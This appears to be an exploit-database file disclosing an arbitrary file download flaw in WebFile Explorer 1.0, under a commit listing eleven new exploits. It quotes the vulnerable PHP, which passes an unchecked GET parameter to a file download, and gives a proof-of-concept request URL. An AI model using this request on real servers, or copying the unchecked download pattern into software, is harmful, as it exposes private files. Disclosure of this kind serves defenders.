e0d5ee5024
11 new exploits Microsoft Edge 38.14393.1066.0 - 'textarea.defaultValue' Memory Disclosure WordPress Plugin WatuPRO 5.5.1 - SQL Injection DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request DALIM SOFTWARE ES Core 5.0 build 7184.1 - Directory Traversal DALIM SOFTWARE ES Core 5.0 build 7184.1 - Server-Side Request Forgery WebFile Explorer 1.0 - Arbitrary File Download ImageBay 1.0 - SQL Injection GIF Collection 2.0 - SQL Injection Piwigo Plugin User Tag 0.9.0 - Cross-Site Scripting Red-Gate SQL Monitor < 3.10/4.2 - Authentication Bypass
35 lines
1.1 KiB
Text
Executable file
35 lines
1.1 KiB
Text
Executable file
# # # # #
|
|
# Exploit Title: WebFile Explorer 1.0 - Arbitrary File Download
|
|
# Dork: N/A
|
|
# Date: 09.08.2017
|
|
# Vendor Homepage : http://speicher.host/
|
|
# Software Link: https://codecanyon.net/item/webfile-explorer/20366192/
|
|
# Demo: http://speicher.host/envato/codecanyon/demo/web-file-explorer/
|
|
# Version: 1.0
|
|
# Category: Webapps
|
|
# Tested on: WiN7_x64/KaLiLinuX_x64
|
|
# CVE: N/A
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Social: @ihsansencan
|
|
# # # # #
|
|
# Description:
|
|
# The security obligation allows an attacker to arbitrary download files..
|
|
#
|
|
# Vulnerable Source:
|
|
# 1 .............
|
|
# 2 $file = $_GET['id'];
|
|
# 3
|
|
# 4 if (file_exists($file)) {
|
|
# 5 header('Content-Description: File Transfer');
|
|
# 6 header('Content-Type: application/octet-stream');
|
|
# 7 header('Content-Disposition: attachment; filename="'.basename($file).'"');
|
|
# 8 header('Expires: 0');
|
|
# 9 header('Cache-Control: must-revalidate');
|
|
# 10 .............
|
|
# Proof of Concept:
|
|
# http://localhost/[PATH]/web-file-explorer/download.php?id=WebExplorer/[FILE]
|
|
#
|
|
# Etc...
|
|
# # # # #
|